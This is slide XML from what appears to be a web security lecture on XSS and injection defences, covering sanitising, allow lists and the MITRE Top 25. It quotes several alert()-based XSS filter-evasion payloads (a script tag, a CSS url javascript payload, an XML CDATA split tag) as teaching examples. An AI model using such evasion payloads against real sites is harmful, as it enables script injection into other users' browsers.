              <a:t>They are both attacks that run in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>They are both attacks that run on the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>They both involve stealing private information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They both happen when user input, intended as data, is treated as code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2189183126"/>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Shape 855"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="514095">
              <a:defRPr sz="9856"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>XSS Defense: Filter/Escape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Shape 856"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Typical defense is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>sanitizing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: remove all executable portions of user-provided content that will appear in HTML pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>E.g., look for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> ... </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> from provided content and remove it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>So, if I fill in the “name” field for Facebook as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(0)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> then the script tags are removed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2666498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5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 grpId="0" build="p" bldLvl="5"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="484886">
              <a:defRPr sz="9296"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Problem: Finding the Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Shape 860"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Bad guys are inventive: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>lots</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> of ways to introduce </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; e.g., CSS tags and XML-encoded data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="983287" lvl="1" indent="-538787"/>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div style="background-image: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>(’JavaScript’))"&gt;...&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>cript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(’XSS’);"&gt;]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Worse: browsers “helpful” by parsing broken HTML!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Samy figured out that IE permit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> tag to be split across two lines; evaded </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Hard to get it all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1239611685"/>
      </p:ext>
    </p:extLst>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6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6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86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86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86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860">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8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0" build="p"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="566674">
              <a:defRPr sz="10864"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Better defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Shape 863"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Instead of trying to sanitize, ensure that your application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>checks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> all </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1032182" lvl="1" indent="-601017" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4462"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>headers, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1032182" lvl="1" indent="-601017" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4462"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>cookies, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1032182" lvl="1" indent="-601017" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4462"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>query strings, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1032182" lvl="1" indent="-601017" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4462"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>form fields, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1032182" lvl="1" indent="-601017" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4462"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>hidden fields (i.e., all parameters) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>… against a rigorous spec of what should be allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>se a simple, restricted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>language such as markdown, not (complex!) HTML</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1691356783"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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6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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="863">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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300"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="863">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>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grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="863">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="863">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86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8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build="p" bldLvl="5"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E3D8-2C33-E0C4-004B-A7DB972F44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23187AA-FE44-22E9-8231-6BDEF30E1714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12327464" y="4812042"/>
            <a:ext cx="11323352" cy="8173708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6582CC-3832-A9A4-EC33-579EB1A7F85E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="656792" y="3246445"/>
            <a:ext cx="11363792" cy="9698934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3558EBC5-20A1-D14B-A76D-4A9B4C6CA6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666192" y="5624949"/>
            <a:ext cx="11286660" cy="2405018"/>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8" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F8AB27F-FCDC-B3FE-23B7-41389B435AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656790" y="8942226"/>
            <a:ext cx="11363792" cy="666724"/>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5" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{799D2005-C2F3-64EC-A2C4-85E8B52B65FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12521025" y="3437981"/>
            <a:ext cx="5761514" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>WWW vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0D8BBDE-7EB0-F5C5-2722-25D853C7679C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12327462" y="9941945"/>
            <a:ext cx="11323352" cy="520328"/>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6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EDB163-FD57-58C2-80EA-A44642CF3964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270863" y="730251"/>
            <a:ext cx="21759618" cy="2651126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>MITRE Top 25 Common Weakness Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3636823-1D8D-7726-9A49-DD8398076D1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656790" y="10408470"/>
            <a:ext cx="11363792" cy="1063093"/>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8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB5D8BB-6DAF-8126-E3BB-D4DA7EC4DB21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654801" y="11343339"/>
            <a:ext cx="11359156" cy="825815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B05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9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30825A0-208F-FA70-1271-DF1E57FF76C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12309562" y="7643048"/>
            <a:ext cx="11359156" cy="520329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B05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0" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4380632E-BAC8-E2C4-142E-2E81E25EB1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12327464" y="4812042"/>
            <a:ext cx="11363792" cy="812907"/>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0" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
